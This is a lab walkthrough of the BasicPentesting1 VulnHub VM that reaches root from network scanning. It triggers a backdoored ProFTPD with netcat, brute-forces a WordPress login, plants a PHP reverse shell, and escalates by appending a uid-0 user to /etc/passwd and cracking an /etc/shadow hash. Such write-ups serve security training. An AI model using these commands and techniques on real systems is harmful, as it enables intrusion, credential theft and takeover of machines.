Posts BasicPentesting1 VM Walkthrough
Post
Cancel

BasicPentesting1 VM Walkthrough

VM : BasicPentesting1

Download Link : https://www.vulnhub.com/entry/basic-pentesting-1,216/

Start the VM and get the IP of VM :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
 $ nmap -sP 192.168.1.0/24 
 
 Nmap scan report for 192.168.1.1
 Host is up (0.00060s latency).
 Nmap scan report for 192.168.1.2
 Host is up (0.000024s latency).
 Nmap scan report for 192.168.1.3
 Host is up (0.0014s latency).
 Nmap scan report for 192.168.1.9
 Host is up (0.11s latency).
 Nmap scan report for 192.168.1.10
 Host is up (0.0015s latency).
 Nmap scan report for 192.168.1.15
 Host is up (0.0012s latency).
 Nmap scan report for 192.168.1.100
 Host is up (0.00080s latency).

At above list 192.168.1.15 is our VM ip address. At above list 192.168.1.15 is our VM ip address.

At above list 192.168.1.15 is our VM ip address.

Scanning network

1
2
3
4
5
6
7
8
9
10
11
12
13
14
 $ nmap -sV 192.168.1.15
 
 Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-28 18:53 UTC
 Nmap scan report for 192.168.1.15
 Host is up (0.0034s latency).
 Not shown: 997 closed ports
 PORT   STATE SERVICE VERSION
 21/tcp open  ftp     ProFTPD 1.3.3c
 22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
 80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
 
 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 7.54 seconds

Nothing unusual, but a quick search for ProFTPD 1.3.3c revealed that it is backdoored version of FTP server. To exploit this backdoor we just need to connect to port 21 with netcat and sends the trigger “HELP ACIDBITCHEZ”.

1
2
3
4
5
 $ nc 192.168.1.15 21
 220 ProFTPD 1.3.3c Server (vtcsec) [192.168.1.15]
 HELP ACIDBITCHEZ
 uname -a
 Linux vtcsec 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

To get a proper interactive shell we can use a python trick:

1
python -c 'import pty;pty.spawn("/bin/bash")';
1
2
3
 $ nc 192.168.1.15 21
 python -c 'import pty;pty.spawn("/bin/bash")';
 root@vtcsec:/#

We got the root access to the machine. Now lets find another ways to get root.

Reconn for Web Applications

Using dirb :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
 $ dirb http://192.168.1.15
 
 -----------------
 DIRB v2.22    
 By The Dark Raver
 -----------------
 
 START_TIME: Sat Sep 28 19:16:46 2019
 URL_BASE: http://192.168.1.15/
 WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
 
 -----------------
 
 GENERATED WORDS: 4612                                                          
 
 ---- Scanning URL: http://192.168.1.15/ ----
 + http://192.168.1.15/index.html (CODE:200|SIZE:177

 ==> DIRECTORY: http://192.168.1.15/secret

 + http://192.168.1.15/server-status (CODE:403|SIZE:277

 ---- Entering directory: http://192.168.1.15/secret/ ----
 + http://192.168.1.15/secret/index.php (CODE:301|SIZE:0

 ==> DIRECTORY: http://192.168.1.15/secret/wp-admin

 ==> DIRECTORY: http://192.168.1.15/secret/wp-content

 ==> DIRECTORY: http://192.168.1.15/secret/wp-includes

 + http://192.168.1.15/secret/xmlrpc.php (CODE:405|SIZE:42]
 
 ---- Entering directory: http://192.168.1.15/secret/wp-admin/ ----
 + http://192.168.1.15/secret/wp-admin/admin.php (CODE:302|SIZE:0

 ==> DIRECTORY: http://192.168.1.15/secret/wp-admin/css

 ==> DIRECTORY: http://192.168.1.15/secret/wp-admin/images

 ==> DIRECTORY: http://192.168.1.15/secret/wp-admin/includes

 + http://192.168.1.15/secret/wp-admin/index.php (CODE:302|SIZE:0

 ==> DIRECTORY: http://192.168.1.15/secret/wp-admin/js

 ==> DIRECTORY: http://192.168.1.15/secret/wp-admin/maint

 ==> DIRECTORY: http://192.168.1.15/secret/wp-admin/network

 ==> DIRECTORY: http://192.168.1.15/secret/wp-admin/user
 
 ---- Entering directory: http://192.168.1.15/secret/wp-content/ ----
 + http://192.168.1.15/secret/wp-content/index.php (CODE:200|SIZE:0

 ==> DIRECTORY: http://192.168.1.15/secret/wp-content/plugins

 ==> DIRECTORY: http://192.168.1.15/secret/wp-content/themes

 ==> DIRECTORY: http://192.168.1.15/secret/wp-content/upgrade

 ==> DIRECTORY: http://192.168.1.15/secret/wp-content/uploads

 ---- Entering directory: http://192.168.1.15/secret/wp-includes/ ----
 (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
     (Use mode '-w' if you want to scan it anyway)
 
 ---- Entering directory: http://192.168.1.15/secret/wp-admin/css/ ----
 (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
     (Use mode '-w' if you want to scan it anyway)
 
 ---- Entering directory: http://192.168.1.15/secret/wp-admin/images/ ----
 (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
     (Use mode '-w' if you want to scan it anyway)
 
 ---- Entering directory: http://192.168.1.15/secret/wp-admin/includes/ ----
 (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
     (Use mode '-w' if you want to scan it anyway)
 
 ---- Entering directory: http://192.168.1.15/secret/wp-admin/js/ ----
 (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
     (Use mode '-w' if you want to scan it anyway)
 
 ---- Entering directory: http://192.168.1.15/secret/wp-admin/maint/ ----
 (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
     (Use mode '-w' if you want to scan it anyway)
 
 ---- Entering directory: http://192.168.1.15/secret/wp-admin/network/ ----
 + http://192.168.1.15/secret/wp-admin/network/admin.php (CODE:302|SIZE:0

 + http://192.168.1.15/secret/wp-admin/network/index.php (CODE:302|SIZE:0

 ---- Entering directory: http://192.168.1.15/secret/wp-admin/user/ ----
 + http://192.168.1.15/secret/wp-admin/user/admin.php (CODE:302|SIZE:0)                                                                                            
 + http://192.168.1.15/secret/wp-admin/user/index.php (CODE:302|SIZE:0

 ---- Entering directory: http://192.168.1.15/secret/wp-content/plugins/ ----
 + http://192.168.1.15/secret/wp-content/plugins/index.php (CODE:200|SIZE:0)                                                                                        
 ---- Entering directory: http://192.168.1.15/secret/wp-content/themes/ ----
 + http://192.168.1.15/secret/wp-content/themes/index.php (CODE:200|SIZE:0)                                                                                         
 ---- Entering directory: http://192.168.1.15/secret/wp-content/upgrade/ ----
 (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
     (Use mode '-w' if you want to scan it anyway)
 
 ---- Entering directory: http://192.168.1.15/secret/wp-content/uploads/ ----
 (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
     (Use mode '-w' if you want to scan it anyway)
 
 -----------------
 END_TIME: Sat Sep 28 19:17:13 2019

At above scan we find that there is a hidden wordpress blog at http://192.168.1.15/secret/, lets check it out.

This blog will redirect to http://vtcsec/secret/, so we add vtcsec into our /etc/hosts file.

1
sudo echo "vtcsec 192.168.1.15" >> /etc/hosts   

Now the wordpress blog will properly open.

Scan wordpress blog with wpscan :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
$ wpscan --url http://192.168.1.15/secret/ --enumerate u
 
         __          _______   _____                                                                                                                                                                                
         \ \        / /  __ \ / ____|                                                                                                                                                                               
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ _                                                                                                                                                              
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \                                                                                                                                                               
            \  /\  /  | |     ____) | (__| (_| | | | |                                                                                                                                                              
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|                                                                                                                                                              
 
         WordPress Security Scanner by the WPScan Team                                                                                                                                                              
                        Version 3.7.1                                                                                                                                                                               
       WPScan.io - Online WordPress Vulnerability Scanner                                                                                                                                                           
       @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_                                                                                                                                                            
 _______________________________________________________________                                                                                                                                                                                                                                                                                        
 [+] URL: http://192.168.1.15/secret/                                                                                                                                                                               
 [+] Started: Sun Sep 29 05:46:41 2019                                                                                                                                                                                                     
 Interesting Finding(s):                                                                                                                                                                                            
 [+] http://192.168.1.15/secret/                                                                                                                                                                                    
  | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)                                                                                                                                                               
  | Found By: Headers (Passive Detection)                                                                                                                                                                           
  | Confidence: 100%                                                                                                                                                                                                
 [+] http://192.168.1.15/secret/xmlrpc.php                                                                                                                                                                          
  | Found By: Direct Access (Aggressive Detection)       
  | Confidence: 100%
  | References:
  |  - http://codex.wordpress.org/XML-RPC_Pingback_API
  |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
  |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
  |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
  |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
 
 [+] http://192.168.1.15/secret/readme.html
  | Found By: Direct Access (Aggressive Detection)
  | Confidence: 100%
 
 [+] Upload directory has listing enabled: http://192.168.1.15/secret/wp-content/uploads/
  | Found By: Direct Access (Aggressive Detection)
  | Confidence: 100%
 
 [+] http://192.168.1.15/secret/wp-cron.php
  | Found By: Direct Access (Aggressive Detection)
  | Confidence: 60%
  | References:
  |  - https://www.iplocation.net/defend-wordpress-from-ddos
  |  - https://github.com/wpscanteam/wpscan/issues/1299
 
 [+] WordPress version 4.9.11 identified (Latest, released on 2019-09-05).
  | Detected By: Emoji Settings (Passive Detection)
  |  - http://192.168.1.15/secret/, Match: '-release.min.js?ver=4.9.11'
  | Confirmed By: Meta Generator (Passive Detection)
  |  - http://192.168.1.15/secret/, Match: 'WordPress 4.9.11'
 
 [i] The main theme could not be detected.
 
 [+] Enumerating Users (via Passive and Aggressive Methods)
  Brute Forcing Author IDs - Time: 00:00:00 <=========================================> (10 / 10) 100.00% Time: 00:00:00
 
 [i] User(s) Identified:
 
 [+] admin
  | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
  | Confirmed By: Login Error Messages (Aggressive Detection)
 
 [!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
 [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/register.
 
 [+] Finished: Sun Sep 29 05:46:42 2019
 [+] Requests Done: 21
 [+] Cached Requests: 29
 [+] Data Sent: 5.049 KB
 [+] Data Received: 10.292 KB
 [+] Memory used: 90.594 MB
 [+] Elapsed time: 00:00:00

As we can see that the userid admin detected by above scan. Now lets bruteforce the wordpress login. We are going to use a simple wordlist file for passwords.

1
wpscan -U admin -P common.txt --url http://192.168.1.12/secret/

And the output shows the password, which is also admin.

1
2
3
4
 .....
 [i] Valid Combinations Found:
  | Username: admin, Password: admin
 .....

Now login to wordpress with above credentials.

Getting a shell using php reverse shell code :

Link for php reverse shell : Github Link

Change the port number and IP address on script, then put it to the index.php file on wordpress.

Now start netcat listener

1
$ nc -lvvp 1234

And open the wordpress page.

1
2
3
4
5
6
7
8
9
10
11
$ nc -lvvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from vtcsec 52724 received!
Linux vtcsec 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
  04:46:01 up 2 min,  0 users,  load average: 0.58, 0.60, 0.26
  USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
  uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ 

We got the shell but its not the root shell, we need to escalate the privilege to root.

Getting root privilege :

1st Method: By overwriting the /etc/passwd file :

As we can see that /etc/passwd is permitted to read-write for all users.

1
2
 $ ls -al /etc/passwd
 -rw-rw-rw- 1 root root 2364 Nov 16  2017 /etc/passwd

So by appending a new user who has root privilege assigned, into the /etc/passwd file with password we are able to get root shell.

Preparing new user to append on file :

The root user entry is look like this :

1
root:x:0:0:root:/root:/bin/bash

where the different columns are as follows :

1
Username : Encrypted_Password : UserID : GroupID : UserID_Info : Home_Directory : Command_Shell

At the place of password there is x which means the password is stored on the /etc/shadow file. Now lets create encrypted password for new user :

1
2
3
$ openssl passwd -1 -salt hack password123
 
$1$hack$MLgkAESrYp7kzYz0Ex2fV/

Where :

  • -1 : md5 based password algorithm (other options are -5 for SHA256 and -6 for SHA512 )
  • -salt : salt key, which is “hack”
  • password is password123

Now we have to append below line into /etc/passwd file :

1
newroot:$1$hack$MLgkAESrYp7kzYz0Ex2fV/:0:0:root:/root:/bin/bash  
echo "newroot:\$1\$hack\$MLgkAESrYp7kzYz0Ex2fV/:0:0:root:/root:/bin/bash" >> /etc/passwd

Note : Put \ sign before all the $ sign on the password field, else echo command will try ro interpret it as a variable. Now try to login with our newly created user.

1
2
 $ su - newroot
 su: must be run from a terminal  

But it through an error, means we need a tty terminal, which can be obtained by python pty library trick.

1
python -c 'import pty;pty.spawn("/bin/bash");'  
1
2
3
4
5
6
7
8
9
10
$ python -c 'import pty;pty.spawn("/bin/bash");'
www-data@vtcsec:/$
www-data@vtcsec:/$ su - newroot
su - newroot
Password: password123

root@vtcsec:~# whoami
whoami
root
root@vtcsec:~#

Yep!!!, we got the root shell.!!

2nd Method: By cracking password of existing users :

This method only works if the /etc/shadow file is world readable, which is not allowed by default. But in this case we can read /etc/shadow file

1
2
3
4
5
6
7
8
9
10
11
12
13
$ cat /etc/shadow

root:!:17484:0:99999:7:::
daemon:*:17379:0:99999:7:::
bin:*:17379:0:99999:7:::
....
....
....
saned:*:17379:0:99999:7:::
usbmux:*:17379:0:99999:7:::
marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/:17484:0:99999:7:::
mysql:!:17486:0:99999:7:::
sshd:*:17486:0:99999:7:::

The shadow file stores actual password in encrypted format for user’s account with additional properties related to user password i.e. it stores secure user account information.

As we can see the user marlinspike have encrypted password :

1
marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/:17484:0:99999:7:::

Now save the above line onto the file pass.txt and then we try to crack the hashed password john (jtr).

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
root@ae3e2e69805d:~/# john pass.txt 

Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
marlinspike      (marlinspike)
1g 0:00:00:00 DONE 1/3 (2019-09-29 09:24) 4.347g/s 34.78p/s 34.78c/s 34.78C/s marlinspike..marlin
Use the "--show" option to display all of the cracked passwords reliably
Session completed

root@ae3e2e69805d:~/# john --show pass.txt 

marlinspike:marlinspike:17484:0:99999:7:::

1 password hash cracked, 0 left

and the password for marlinspike is marlinspike, now lets try to login into marlinspike account.

1
2
$ su - marlinspike
su: must be run from a terminal

Means we need tty shell then try to change root.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@vtcsec:/$ su - marlinspike    
su - marlinspike
Password: marlinspike

marlinspike@vtcsec:~$ whoami
whoami
marlinspike

marlinspike@vtcsec:~$ sudo su
sudo su
[sudo] password for marlinspike: marlinspike

root@vtcsec:/home/marlinspike# whoami
whoami
root

root@vtcsec:/home/marlinspike# 

WE got root shell again.

This post is licensed under CC BY 4.0 by the author.
Contents